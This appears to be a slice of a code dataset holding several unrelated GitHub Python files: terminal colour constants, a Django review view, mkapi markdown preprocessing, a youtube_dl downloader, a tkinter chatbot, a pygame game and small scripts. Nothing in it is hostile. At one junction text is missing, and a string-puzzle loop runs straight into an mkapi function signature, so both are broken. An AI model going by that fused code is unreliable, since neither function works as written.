PURPLE\nCYAN_U = \"\\033[4;36m\" # CYAN\nWHITE_U = \"\\033[4;37m\" # WHITE\n\n# NOTE: BACKGROUND\nBLACK_BG = \"\\033[40m\" # BLACK\nRED_BG = \"\\033[41m\" # RED\nGREEN_BG = \"\\033[42m\" # GREEN\nYELLOW_BG = \"\\033[43m\" # YELLOW\nBLUE_BG = \"\\033[44m\" # BLUE\nMAGENTA_BG = \"\\033[45m\" # PURPLE\nCYAN_BG = \"\\033[46m\" # CYAN\nWHITE_BG = \"\\033[47m\" # WHITE\n\nFOREGROUND_COLORS = {\n \"\": RESET,\n \"BLACK\": BLACK,\n \"RED\": RED,\n \"GREEN\": GREEN,\n \"YELLOW\": YELLOW,\n \"BLUE\": BLUE,\n \"MAGENTA\": MAGENTA,\n \"CYAN\": CYAN,\n \"WHITE\": WHITE,\n}\nBACKGROUND_COLORS = {\n \"\": RESET,\n \"BLACK\": BLACK_BG,\n \"RED\": RED_BG,\n \"GREEN\": GREEN_BG,\n \"YELLOW\": YELLOW_BG,\n \"BLUE\": BLUE_BG,\n \"MAGENTA\": MAGENTA_BG,\n \"CYAN\": CYAN_BG,\n \"WHITE\": WHITE_BG,\n}\n\nCOLORS = {\n **FOREGROUND_COLORS,\n \"BLACK-BG\": BLACK_BG,\n \"RED-BG\": RED_BG,\n \"GREEN-BG\": GREEN_BG,\n \"YELLOW-BG\": YELLOW_BG,\n \"BLUE-BG\": BLUE_BG,\n \"MAGENTA-BG\": MAGENTA_BG,\n \"CYAN-BG\": CYAN_BG,\n \"WHITE-BG\": WHITE_BG,\n}\n\n\n# TODO: change naming scheme\n# HIGH INTENSITY\nIBLACK = \"\\033[0;90m\" # BLACK\nIRED = \"\\033[0;91m\" # RED\nIGREEN = \"\\033[0;92m\" # GREEN\nIYELLOW = \"\\033[0;93m\" # YELLOW\nIBLUE = \"\\033[0;94m\" # BLUE\nIMAGENTA = \"\\033[0;95m\" # PURPLE\nICYAN = \"\\033[0;96m\" # CYAN\nIWHITE = \"\\033[0;97m\" # WHITE\n\n# BOLD HIGH INTENSITY\nBIBLACK = \"\\033[1;90m\" # BLACK\nBIRED = \"\\033[1;91m\" # RED\nBIGREEN = \"\\033[1;92m\" # GREEN\nBIYELLOW = \"\\033[1;93m\" # YELLOW\nBIBLUE = \"\\033[1;94m\" # BLUE\nBIMAGENTA = \"\\033[1;95m\" # PURPLE\nBICYAN = \"\\033[1;96m\" # CYAN\nBIWHITE = \"\\033[1;97m\" # WHITE\n\n# HIGH INTENSITY BACKGROUNDS\nON_IBLACK = \"\\033[0;100m\" # BLACK\nON_IRED = \"\\033[0;101m\" # RED\nON_IGREEN = \"\\033[0;102m\" # GREEN\nON_IYELLOW = \"\\033[0;103m\" # YELLOW\nON_IBLUE = \"\\033[0;104m\" # BLUE\nON_IMAGENTA = \"\\033[0;105m\" # PURPLE\nON_ICYAN = \"\\033[0;106m\" # CYAN\nOn_IWHITE = \"\\033[0;107m\" # 
White\n","repo_name":"Saccharine-Coal/colored_logger","sub_path":"colored_logger/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28133708656","text":"from django.urls import reverse\nfrom gbe.functions import validate_perms\nfrom gbe.models import Class\nfrom gbe.views import ReviewBidListView\n\n\nclass ReviewClassListView(ReviewBidListView):\n reviewer_permissions = ('Class Reviewers', )\n object_type = Class\n bid_review_view_name = 'class_review'\n bid_review_list_view_name = 'class_review_list'\n template = 'gbe/class_review_list.tmpl'\n\n def set_row_basics(self, bid, review_query):\n bid_row = super(ReviewClassListView, self).set_row_basics(bid,\n review_query)\n if self.can_schedule:\n url = reverse(\"class_changestate\",\n urlconf='gbe.urls',\n args=[bid.id])\n if bid.accepted == 3:\n bid_row['extra_button'] = {'url': url,\n 'text': \"Add to Schedule\"}\n elif bid.ready_for_review:\n bid_row['extra_button'] = {'url': url,\n 'text': \"Accept & Schedule\"}\n return bid_row\n\n def groundwork(self, request):\n super(ReviewClassListView, self).groundwork(request)\n self.can_schedule = validate_perms(request,\n ('Scheduling Mavens',),\n False)\n","repo_name":"bethlakshmi/gbe-divio-djangocms-python2.7","sub_path":"gbe/views/review_class_list_view.py","file_name":"review_class_list_view.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"29707207949","text":"cases=eval(input())\noutput=[]\nfor i in range(cases):\n n=eval(input())\n word=input()\n seen=set()\n left=0\n ans=[]\n while left Tuple[str, str]:\n line = markdown.split(\"\\n\")[0]\n if \":\" in line:\n index = line.index(\":\")\n type = line[:index].strip()\n markdown = markdown[index + 1 :].strip()\n return type, markdown\n else:\n return \"\", markdown\n\n\ndef strip_ptags(html: str) -> str:\n html = html.replace(\"
<p>\", \"\").replace(\"</p>\", \"<br>\")\n    if html.endswith(\"<br>\"):\n        html = html[:-4]\n    return html\n
\"):\n html = html[:-4]\n return html\n\n\ndef convert(text: str) -> str:\n blocks = []\n for block in split(text):\n if block.startswith(\">>>\"):\n block = f\"~~~python\\n{block}\\n~~~\\n\"\n blocks.append(block)\n return \"\\n\".join(blocks).strip()\n\n\ndef delete_indent(lines, start, stop):\n from mkapi.core.docstring import get_indent\n\n indent = get_indent(lines[start])\n return \"\\n\".join(x[indent:] for x in lines[start:stop]).strip()\n\n\ndef split(text: str) -> Iterator[str]:\n start = 0\n in_code = False\n lines = text.split(\"\\n\")\n for stop, line in enumerate(lines, 1):\n if \">>>\" in line and not in_code:\n if start < stop - 1:\n yield \"\\n\".join(lines[start : stop - 1])\n start = stop - 1\n in_code = True\n elif not line.strip() and in_code:\n yield delete_indent(lines, start, stop)\n start = stop\n in_code = False\n if start < len(lines):\n yield delete_indent(lines, start, len(lines))\n\n\ndef admonition(name: str, markdown: str) -> str:\n if name.startswith(\"Note\"):\n type = \"note\"\n elif name.startswith(\"Warning\"):\n type = \"warning\"\n else:\n type = name.lower()\n lines = [\" \" + line if line else \"\" for line in markdown.split(\"\\n\")]\n lines.insert(0, f'!!! {type} \"{name}\"')\n return \"\\n\".join(lines)\n","repo_name":"daizutabi/mkapi","sub_path":"mkapi/core/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"76"} +{"seq_id":"31149830743","text":"#--------------------------------------------------------------------\n# TITLE: Internet Video Downloader \n# AUTHOR: Andre Rosa\n# DATE: 18 FEB 2018\n# TESTED WITH: Youtube, Twitch, Daily Motion, Facebook, Veoh and Liveleak\n# OBJECTIVE: This module is the FIRST part of the Categorizer Program. \n#--------------------------------------------------------------------\n\n# PROBLEM:\n# Some files are downloaded as mkv, flv and other formats. The program failed when converting some of these files to mp4.\n# I tried to convert from mkv to h.264 and got an error of a missing codec, check available codecs with 'ffmpeg -codecs'\n# look some explanation on: https://stackoverflow.com/questions/30898671/converting-mkv-to-h-264-ffmpeg\n# and then on: https://askubuntu.com/questions/483187/winff-ffmpeg-unknown-encoder-libvo-aacenc\n# The problem is that some codecs that allow conversion are missing on this computer. \n# I will not install the missing codecs because the final user will not use this computer for production.\n# SOLUTION:\n# if the program can not convert the video to mp4 it will ignore the video and add a line in the Error_Report 'missing codec to convert to mp4'\n\n# DEPENDENCIES\nfrom __future__ import unicode_literals\n\nimport youtube_dl # version 2019.2.8 https://anaconda.org/conda-forge/youtube-dl\n # for a list of supported sites for youtube_dl: https://rg3.github.io/youtube-dl/supportedsites.html\nimport urllib # version 1.7.1 https://anaconda.org/conda-forge/python_http_client\n\n# mylibs\n# import sys\n# sys.path.insert(0, '../../0. 
Commons')\nfrom sysColor import sysColor\n\n#=========================================================================================\n# VIDEODOWNLOADER\n#=========================================================================================\nclass VideoDownloader:\n\n #=========================================================\n # VIDEO INFO: Nested class holds the information about a video\n #=========================================================\n class VideoInfo:\n def __init__(self, info, url, uniqueName):\n ''' VideoInfo Constructor '''\n self.vid_url = url\n self.vid_id = info.get(\"id\", None)\n self.vid_uname = uniqueName # generates a unique name for the video\n self.vid_title = info.get('title', None) # the original video title taken from the home page\n self.vid_vcodec = info.get('vcodec', None) #video codec\n self.vid_acodec = info.get('acodec', None) #audio codec\n\n # Return a message about the codecs for the video\n def getCodedInfo (self):\n ''' Return a text message about the video to be saved on file. '''\n msg = str(str(self.vid_uname) + ',' + str(self.vid_vcodec) + ',' + str(self.vid_acodec) + ',' + str(self.vid_url) )\n return msg\n \n def getVideoName (self):\n ''' Return the string Video Title '''\n return self.vid_uname\n #=========================================================\n\n #=========================================================\n # NESTED CLASS USED TO AVOID TOO VERBOSE YOUTUBE_DL MESSAGES\n #=========================================================\n class MyLogger:\n def debug(self, msg):\n pass\n def warning(self, msg):\n pass\n def error(self, msg):\n pass\n #print(msg)\n #=========================================================\n\n #------------------------------------------------------------\n def __my_hook(self, d):\n if d['status'] == 'finished':\n print('Done downloading, now converting ...')\n #------------------------------------------------------------\n #------------------------------------------------------------\n def setVideoFolder(self, folder):\n self.videoFolder = folder\n #------------------------------------------------------------\n\n #------------------------------------------------------------\n # GENERATE A UNIVERSLLY UNIQUE IDENTIFIER FOR THE VIDEO NAME\n #------------------------------------------------------------\n def __generateUniqueName (self):\n ''' Return a universally unique identifier created with uuid.'''\n import uuid # https://docs.python.org/2/library/uuid.html\n return uuid.uuid4().hex # to create unique file names\n #------------------------------------------------------------\n\n #-------------------------------------------------------------\n # CONFIGURATION OF THE YOUTUBE DOWNLOADER\n #-------------------------------------------------------------\n def __getDLConfiguration(self, uniqueName):\n ''' Return the parameters used to download files with YouTube_DL '''\n\n # PARAMETERS FOR THE DOWNLOADER\n # https://github.com/rg3/youtube-dl/blob/master/README.md\n # https://github.com/rg3/youtube-dl/blob/master/README.md#embedding-youtube-dl\n ydl_opts = {\n 'write-auto-sub': False,\n 'skip-download': True,\n 'recode-video': 'mp4',\n 'outtmpl': self.videoFolder + '/' + uniqueName + '.%(ext)s', #'./videos/%(title)s.%(ext)s'\n 'logger': self.logger,\n 'progress_hooks': [self.__my_hook],\n } # https://stackoverflow.com/questions/35643757/how-to-set-directory-in-ydl-opts-in-using-youtube-dl-in-python\n\n return ydl_opts\n #---------------------------------------------------------------\n\n 
#---------------------------------------------------------------\n # VIDEODOWNLOADER CONSTRUCTOR\n #---------------------------------------------------------------\n def __init__(self, videoList = None):\n '''VideoDownloader Constructor receives the txt file (videoList) with the list of url to download.\\n\n If no list is passed the downloader can be used to download single videos with download method '''\n\n if (videoList != None):\n self.files = self.__load_list (videoList)\n self.fileName = videoList\n else:\n self.files = []\n self.fileName = ''\n\n self.errorList = [] # a list of videos and error causes\n self.vidInfoList = [] # holds the data of all videos (ok or not) with url and codecs\n self.logger = self.MyLogger()\n self.vidOK = [] # list of videos that was downloaded successfully \n self.videoFolder = './videos' #folder to save videos # default value of video destination folder\n\n # create movie directory if does not exist\n import os\n if not os.path.exists(self.videoFolder):\n os.makedirs(self.videoFolder)\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # SET THE URL FILE WITH VIDEO URL TO DOWNLOAD\n #--------------------------------------------------------------------\n def setURLList (self, videoList):\n ''' Public method to set and load file with the videos url.''' \n self.files = self.__load_list (videoList)\n self.fileName = videoList\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # LOAD THE FILE WITH URL TO DOWNLOAD\n #--------------------------------------------------------------------\n def __load_list(self, fileName):\n ''' Load the .txt file with video URL to download '''\n\n import numpy as np\n import os.path\n if os.path.isfile(fileName):\n return np.genfromtxt(fileName,dtype='str')\n else:\n print (sysColor.Red + 'File ' + fileName + ' does not exists.' 
+ sysColor.White)\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # ELIMINATE FROM STRING THE INVISIBLE CHARACTERS\n #--------------------------------------------------------------------\n def __filter_nonprintable(self, text):\n import string\n # Get the difference of all ASCII characters from the set of printable characters\n nonprintable = set([chr(i) for i in range(128)]).difference(string.printable)\n # Use translate to remove all non-printable characters\n return text.translate({ord(character):None for character in nonprintable})\n #--------------------------------------------------------------------\n\n #---------------------------------------------------------------------\n # CHECK IF A VIDEO URL REALLY EXISTS\n # https://docs.python.org/3.1/howto/urllib2.html\n #---------------------------------------------------------------------\n def __isOnlineVideoValid(self, url):\n '''Checks if a video exists in the internet'''\n\n msg = ''\n isValid = False\n req = urllib.request.Request(url)\n try:\n response = urllib.request.urlopen(req)\n response.read() #page = \n isValid = True\n except urllib.error.URLError as e: \n if hasattr(e, 'reason'):\n msg = 'Failed to reach server:', e.reason\n elif hasattr(e, 'code'): \n code = self.__getErrorCode(e)\n msg = 'Error code: ' + str(e) + ' ' + code\n\n self.errorList.append(url + ',' + self.__filter_nonprintable(str(msg) ) )\n print (sysColor.Red + \"INVALID VIDEO: \" + str(e) + sysColor.White + ' ' + str(url) + '\\n')\n\n return isValid\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # GET THE ERROR CODE INTERACTIONG WITH THE responses DICTIONARY\n # how to iteract with dictionaries: \n # https://stackoverflow.com/questions/7409078/iterating-over-dictionary-key-values-corresponding-to-list-in-python\n #--------------------------------------------------------------------\n def __getErrorCode(self, e):\n ''' Get the url connection error description from the error code '''\n from responseCodes import responses\n try:\n return responses[e][1]\n except:\n return 'Unknown Error'\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # PUBLIC METHOD TO GENERATE THE DOWNLOAD REPORTS\n #--------------------------------------------------------------------\n def saveCSVReports (self):\n if len(self.errorList) > 0:\n self.__saveReport(self.errorList, 'error_Rprt')\n\n if len(self.vidInfoList) > 1: #because of the header\n llist = []\n for any in self.vidInfoList:\n llist.append('Video Name,Video Codec,Audio Codec,URL')\n llist.append(any.getCodedInfo())\n\n self.__saveReport(llist, 'vidInfo_Rprt')\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # GENERIC CSV WRITER TO SAVE LISTS OF MESSAGES\n #--------------------------------------------------------------------\n def __saveReport (self, llist, fileName):\n ''' Saves a list of text objects in a csv file.\n The file output has the date-time of the creation. 
'''\n\n import datetime\n now = datetime.datetime.now()\n date_time = now.strftime(\"%Y-%m-%d_%H:%M:%S\") # https://www.programiz.com/python-programming/datetime/strftime\n\n import os\n dir = './reports/'\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n text_file = open(dir + fileName + '_' + date_time + '_.csv', \"w+\")\n for any in llist:\n text_file.write( any + '\\n')\n text_file.close()\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n def getVideoList(self):\n ''' Return the list of videos with generated names to be used for the next step (inception)'''\n return self.vidOK # Return by value, no reference\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # TEST VIDEO DOWNLOAD \n #-------------------------------------------------------------------- \n def __isVideoDownloadedOK (self, vidName, url):\n ''' Check if the file downloaded is a valid video '''\n import os\n from pathlib import Path\n print (sysColor.Blue + 'TEST VIDEO: ' + sysColor.White + url)\n video= Path(self.videoFolder + '/' + vidName+ '.mp4') # video was downloaded successfully\n if video.is_file():\n print (sysColor.Green + 'VALID VIDEO: ' + sysColor.White + url + '\\n')\n self.vidOK.append(vidName)\n else: # check possible errors\n import glob\n if glob.glob(self.videoFolder + '/' + vidName+ '.*'): # check if the file was saved with an invalid extension\n print (sysColor.Red + \"INVALID VIDEO: Missing codecs to convert to .mp4 \" + sysColor.White + str(url) + '\\n')\n for any in glob.glob(self.videoFolder + '/' + vidName + '.*'):\n os.remove(any) \n self.errorList.append (url + ',' + 'ERROR: Missing codecs to convert to .mp4')\n else:\n print (sysColor.Red + \"INVALID VIDEO: Names do not match. \" + sysColor.White + str(url) + '\\n')\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # DOWNLOAD SINGLE VIDEOS\n #--------------------------------------------------------------------\n def __downloadVideo (self, url):\n ''' Downsload a single video from the URL received as parameter. ''' \n\n print (sysColor.Yellow + 'DOWNLOAD ATTEMPT: ' + sysColor.White + url)\n uniqueName = self.__generateUniqueName()\n\n if (self.__isOnlineVideoValid(url)): # 0. Tests if URL is valid\n \n with youtube_dl.YoutubeDL(self.__getDLConfiguration(uniqueName)) as ydl:\n try:\n\n # 1. get video info: https://stackoverflow.com/questions/23727943/how-to-get-information-from-youtube-dl-in-python\n info = ydl.extract_info(url, download=False) # Retrieves a dictionary of video information\n vid = self.VideoInfo(info, url, uniqueName)\n self.vidInfoList.append(vid)\n\n # 2. Download video\n ydl.download([url]) \n\n # 3. 
test if video was downloaded correctly\n self.__isVideoDownloadedOK(vid.getVideoName(), url)\n\n except youtube_dl.DownloadError as e:\n msg = self.__filter_nonprintable(str(e))\n self.errorList.append (url + ',ERROR: ' + msg)\n print (sysColor.Red + \"INVALID VIDEO: \" + str(e) + sysColor.White + str(url) + '\\n')\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # DOWNLOAD VIDEOS - MAIN FUNCTION \n #--------------------------------------------------------------------\n def download (self, url = None):\n ''' Download video, receive as parameter a video url.\\n\n If passed without parameter it will download the video list '''\n if (url != None):\n self.__downloadVideo(url)\n else: # download list of videos\n if len(self.files) > 0:\n # for each url in url list \n for url in self.files:\n self.__downloadVideo(url)\n else:\n print (sysColor.Red + 'Video list ' + self.fileName + ' has no videos.' + sysColor.White)\n\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # RETURNS A DICTIONARY WITH THE VALID VIDEO URL, TITLE AND UNIQUE NAME\n #--------------------------------------------------------------------\n def getVideoDataDict (self):\n ''' Returns a dictionary with video name, title and url '''\n dicList = []\n for any in self.vidOK:\n for vid in self.vidInfoList:\n if (any == str(vid.vid_uname ) ):\n ldict = dict (name=vid.vid_uname, url=vid.vid_url, title=vid.vid_title) # create a local dict to hold the data\n dicList.append(ldict)\n\n return dicList\n #---------------------------------------------------------------------\n \n\n#=========================================================================================\n# END OF CLASS VIDEODOWNLOADER\n#=========================================================================================\n","repo_name":"Cadesh/Python_Attic","sub_path":"YouTubeDL_complete/videoDL.py","file_name":"videoDL.py","file_ext":"py","file_size_in_byte":16991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8074174222","text":"import tkinter as tk\nimport os\nos.environ['PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION'] = 'python'\nfrom bot import Bot\nfrom tkinter import Entry, Label, Button, Text, END \n\ndef main():\n def on_send_click():\n input_text = input_box.get()\n response = bot.respond(input_text)\n chat_history.insert(END, \"You: \" + input_text + '\\n')\n chat_history.insert(END, \"Bot: \" + response + '\\n')\n\n bot = Bot(\"guilty_gear_data.db\")\n\n root = tk.Tk()\n root.title(\"Dustloop Chatbot\")\n\n chat_history = Text(root, wrap = tk.WORD)\n chat_history.pack(padx=10, pady=10)\n\n input_box = Entry(root, width=50)\n input_box.pack(padx=20, pady=10)\n\n send_button = Button(root, text=\"Send\", command=on_send_click)\n send_button.pack(padx=10, pady=10)\n\n root.mainloop()\n bot.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jackshouka/NLP_Portfolio","sub_path":"chatbot/driver_bot.py","file_name":"driver_bot.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18836654334","text":"import datetime\nimport time\n\nget_now = datetime.datetime.now()\nprint(\"now\", get_now)\nfrom scheduler import Scheduler\nimport scheduler.trigger as trigger\n\n# def foo():\n# print(\"foo\")\n\n\n# schedule 
= Scheduler()\n\n# schedule.cyclic(datetime.timedelta(seconds=10), foo)\n# schedule.minutely(datetime.time(second=10), foo)\n# schedule.daily(datetime.time(second=10), foo)\n# schedule.exec_jobs()\n\n# print(schedule)\n#\n# while True:\n# schedule.exec_jobs()\n# time.sleep(1)\n\nimport sched\nfrom datetime import date, datetime, timedelta\nfrom suntime import Sun, SunTimeException\n\nnow = datetime.now()\nform = now.strftime(\"%Y-%m-%d %I:%M\")\nprint(\"For\", form)\nprint(\"Forms\", now)\nprint(\"time\", time.time())\nrun_at = now + timedelta(seconds=3)\ndelay = (run_at - now).total_seconds()\n\nprint(delay)\nprint(run_at)\n\ns = sched.scheduler(time.time, time.sleep)\nprint(s)\n\nsun_rise_time = None\nsun_set_time = None\n\n\ndef light_on():\n pass\n\n\ndef light_off():\n pass\n\n\ndef do_something(sec):\n # do your stuff\n\n current_latitude1 = 30.1979793\n current_longitude1 = 71.4724978\n\n print(\"Latitude = \", current_latitude1)\n print(\"Longitude = \", current_longitude1)\n\n get_sun_time = Sun(current_latitude1, current_longitude1)\n\n today_date = datetime.today()\n print(\"today\", today_date)\n global sun_rise_time\n global sun_set_time\n\n sun_rise_time = get_sun_time.get_local_sunrise_time(today_date)\n sun_set_time = get_sun_time.get_local_sunset_time(today_date)\n forms = sun_set_time.strftime(\"%Y-%m-%d %H:%M\")\n\n t = sun_set_time.timestamp()\n print(\"t\", t)\n print(\"Sun\", sun_rise_time)\n print(\"Formsss\", forms)\n print(\"Formsss\", sun_set_time)\n\n print('On {} the sun at Multan raised at {} and get down at {}.'.\n format(today_date, sun_rise_time.strftime('%H:%M'), sun_set_time.strftime('%H:%M')))\n s.enter(delay, 1, do_something, (sec,))\n\n\ns.enter(delay, 1, do_something, (s,))\ns.run()\n","repo_name":"rehmanjameel/python_arconn_test","sub_path":"trigger_fun.py","file_name":"trigger_fun.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12420068282","text":"import pygame\nimport random\n\n# Inițializăm Pygame\npygame.init()\n\n# Definim culorile\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBLUE = (0, 0, 255)\n\n# Setăm dimensiunile ecranului jocului\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n# Setăm titlul jocului\npygame.display.set_caption(\"Farsky-like game\")\n\n# Cream ecranul jocului\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n# Definim variabilele de stare ale jucătorului\nplayer_x = SCREEN_WIDTH // 2\nplayer_y = SCREEN_HEIGHT // 2\nplayer_speed = 5\nplayer_size = 25\n\n# Definim variabilele pentru resurse\nresource_size = 20\nresource_count = 25\nresources = []\nfor i in range(resource_count):\n resource_x = random.randint(0, SCREEN_WIDTH - resource_size)\n resource_y = random.randint(0, SCREEN_HEIGHT - resource_size)\n resources.append(pygame.Rect(resource_x, resource_y, resource_size, resource_size))\n\n# Definim variabilele pentru construcții\nbuildings = []\n\n# Bucla principala a jocului\nrunning = True\nwhile running:\n # Citim toate evenimentele generate de jucător\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Citim tastele apăsate de jucător\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n player_x -= player_speed\n if keys[pygame.K_RIGHT]:\n player_x += player_speed\n if keys[pygame.K_UP]:\n player_y -= player_speed\n if keys[pygame.K_DOWN]:\n player_y += player_speed\n\n # Verificăm dacă jucătorul a ieșit din ecran\n if player_x < 0:\n player_x = 0\n 
elif player_x > SCREEN_WIDTH - player_size:\n player_x = SCREEN_WIDTH - player_size\n if player_y < 0:\n player_y = 0\n elif player_y > SCREEN_HEIGHT - player_size:\n player_y = SCREEN_HEIGHT - player_size\n\n # Verificăm dacă jucătorul a colectat o resursă\n for resource in resources:\n if pygame.Rect(player_x, player_y, player_size, player_size).colliderect(resource):\n resources.remove(resource)\n # Adăugăm o construcție\n building_x = random.randint(0, SCREEN_WIDTH - player_size)\n building_y = random.randint(0, SCREEN_HEIGHT - player_size)\n buildings.append(pygame.Rect(building_x, building_y, player_size, player_size))\n\n # Ștergem ecranul și redesenăm jucătorul și resursele\n screen.fill(BLACK)\n pygame.draw.rect(screen, WHITE, [player_x, player_y, player_size, player_size])\n for resource in resources:\n pygame.draw.rect(screen, BLUE, resource)\n\n # Redesenăm construcțiile\n for building in buildings:\n pygame.draw.rect(screen, WHITE, building)\n\n # Actualizăm ecranul\n pygame.display.update()\n\n# Oprim\n","repo_name":"FisHFisHGG/GG","sub_path":".py","file_name":".py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7098890369","text":"import re\n\n\n\nresource =\"C:\\\\Users\\\\kristhim\\\\Desktop\\\\thimma 01302017\\\\programming\\\\python\\\\csur modules\\\\computeNodeResourceFile\"\n\ntry:\n with open(resource) as f:\n res = f.read().splitlines()\nexcept IOError as err:\n errors = True\n #print(\"Unable to open the \"+ resource + \"for reading.\\n\" + str(err))\n\n\nfirmwareList = []\nfirmwareDict = {}\ncomponentUpdateDict = {'Firmware' : {}, 'Drivers' : {}, 'Software' : {}}\nnicCardModels = []\nupdateDriverList = []\nstarted = False\n# for data in res:\n# #Remove spaces if any are present.\n# data = data.replace(' ', '')\n# if not re.match('Firmware.*', data) and not started:\n# continue\n#\n# elif re.match('Firmware.*', data):\n# started = True\n# continue\n# elif re.match(r'\\s*$', data):\n# break\n# else:\n# firmwareList = data.split('|')\n# #print(firmwareList)\n# firmwareDict[firmwareList[0]] = [firmwareList[1], firmwareList[2]]\n#\n# count = 0\n# for key, value in firmwareDict.items():\n# #print(\"Key :\" + str(key) + \"value :\" + str(value))\n# #print(\"\\n\")\n# count = count + 1\n# #print(count)\n#\n# #print(firmwareList)\n# #print(firmwareDict)\n\n#-----------------------------------------------------------------------------\n# started = False\n# driversFound = False\n# updateDriverList = []\n# mlnxCount = 0\n# csurDriverList = []\n#\n# for data in res:\n# data = data.replace(' ','')\n# #print(data)\n# if not 'Drivers' in data and not driversFound:\n# continue\n# elif 'Drivers' in data:\n# driversFound = True\n# continue\n# elif not (('SLES11.4' in data) and ('DL580Gen9' in data )) and not started:\n# continue\n# elif (('SLES11.4' in data ) and ('DL580Gen9' in data)):\n# started = True\n# continue\n# elif re.match(r'\\s*$', data):\n# break\n# else:\n# csurDriverList = data.split('|')\n# #print(csurDriverList)\n# csurDriver = csurDriverList[0]\n# #print(csurDriver)\n# csurDriverVersion = csurDriverList[1]\n# #print(csurDriverVersion)\n# #print(csurDriverList[2])\n\n\n#--------------------------------------------------------------------------------\n\nstarted = False\nsoftwareFound = False\nupdateSoftwareList = []\n#csurSoftwareList = []\n\nfor data in res:\n data = data.replace(' ','')\n #print(data)\n if not 'Software' in data and not softwareFound:\n 
continue\n elif 'Software' in data:\n softwareFound = True\n continue\n elif not (('SLES11.4' in data) and ('DL580Gen9' in data )) and not started:\n continue\n elif (('SLES11.4' in data ) and ('DL580Gen9' in data)):\n started = True\n continue\n elif re.match(r'\\s*$', data):\n break\n else:\n csurSoftwareList = data.split('|')\n csurSoftware = csurSoftwareList[0]\n csurSoftwareEpoch = csurSoftwareList[1]\n csurSoftwareVersion = csurSoftwareList[2]\n csurSoftwareRpm = csurSoftwareList[3]\n print(csurSoftwareRpm)\n\n#-----------------------------------------------------------------------------------------------\ncomponentHeader = 'Component'\ncomponentUnderLine = '---------'\ncsurVersionHeader = 'CSUR Version'\ncsurVersionUnderLine = '------------'\ncurrentVersionHeader = 'Current Version'\ncurrentVersionUnderLine = '---------------'\nstatusHeader = 'Status'\nstatusUnderLine = '------'\n# print('{0:40}'.format('Firmware Versions:') + '\\n')\n# print('{0:40} {1:25} {2:25} {3}'.format(componentHeader, csurVersionHeader, currentVersionHeader, statusHeader))\n# print('{0:25}'.format(componentHeader,csurVersionHeader))\n\n# command =\"Smart Array P431 in Slot 2 (sn: PCZED0ARH8L03C) \\n\" \\\n# \"Smart Array P830i in Slot 0 (sn: 0014380292CE340)\"\n#\n# #print(command)\n#\n# controllerList = re.findall('P\\d{3}i*\\s+in\\s+Slot\\s+\\d{1}',command)\n#\n# for control in controllerList:\n# print(control)\n# controlModel = control.split()[0]\n# controllerSlot = control.split()[-1]\n# #print(controlModel+\" \"+controllerSlot)\n# csurControllerFirmwareVersion = firmwareDict[controlModel][0]\n# csurControllerFirmwareRpm = firmwareDict[controlModel][1]\n# #print(csurControllerFirmwareVersion+\" \"+csurControllerFirmwareRpm)\n# #print(controllerSlot)\n# #print(controlModel[0]+\"and the slot value is \"+controlModel[3])\n#\n# componentUpdateDict['Firmware'][controlModel] = firmwareDict[controlModel][1]\n# print(componentUpdateDict['Firmware'][controlModel])\n# csurEnclosureFirmwareVersion27 = firmwareDict['D2700'][1]\n# csurEnclosureFirmwareVersion37 = firmwareDict['D3700'][1]\n# print(csurEnclosureFirmwareVersion27)\n# print(csurEnclosureFirmwareVersion37)\n#\n","repo_name":"publiccoding/demorepo","sub_path":"Python/Advanced/dataLoadDict.py","file_name":"dataLoadDict.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41927070948","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\nveriler = pd.read_csv('/home/kontrpars/Desktop/eren/Python/Python-Machine-Learning/csvexamplefolder/Ads_CTR_Optimisation.csv')\n\nN = 10000\nd = 10\ntoplam = 0\nsecilenler = []\nfor n in range(0,N):\n ad = random.randrange(d)\n secilenler.append(ad)\n odul = veriler.values[n,ad] # Verilerdeki n. 
